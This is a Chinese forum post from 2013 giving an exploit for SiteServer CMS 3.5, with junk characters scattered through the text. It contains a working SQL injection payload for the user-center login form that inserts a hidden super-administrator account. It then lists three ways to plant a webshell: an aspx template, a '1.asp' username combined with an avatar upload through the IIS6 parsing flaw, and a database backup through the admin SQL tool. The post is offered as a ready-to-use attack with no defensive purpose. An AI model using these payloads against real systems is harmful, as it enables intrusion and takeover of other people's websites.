经测试秒杀最新的3.5版' y$ p% n3 ~6 R9 E
stieserver官网:www.siteserver.cn
4 R3 E' W0 Q9 f- ^EXP:& Y- Y3 d; ^7 l3 L* r+ R
直接访问UserCenter/login.aspx0 R: c, O" H* O9 i q$ y' R! G
用户名处输入:
" W3 f) F7 [) ^) `* S H$ C6 B7 F/ t2 H: ?: } [* K
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
2 S2 e, V! z3 G4 X" e密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。% p0 I% B: c: r
之后再访问后台SiteServer/login.aspx用插入的用户登陆9 h3 A0 ?. t0 Z; C* V
后台拿webshell的三种方法:+ e6 k3 I! m; b# w) b! x5 x
一、
. V3 K: i. ^4 P站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx2 q# L! `7 V8 w6 w5 x5 V. w/ H
二、
. i# h: h! h' }/ [7 P: s. w成员权限-》添加用户-》用户名为:1.asp+ x7 J5 f1 x1 @ U- V
http://127.0.0.1/usercenter/
# @ c$ P% W& s3 _用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
! L ]; g5 b" @5 v1 ~(ps:后台添加用户时不会验证是否含有非法字符)
' L( y* X; y3 p8 K+ I: x三、0 O+ S, x% B+ y! J8 t3 L
系统工具-》实用工具-》机器参数查看
, B! ~1 @: `0 l可以看到数据库类型、名称,WEB路径" ], o( g. v5 ?. b. N5 h6 l& x' J
系统工具-》数据库工具-》SQL语句查询
! U2 U$ Z& T( d) |/ E7 N7 z这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对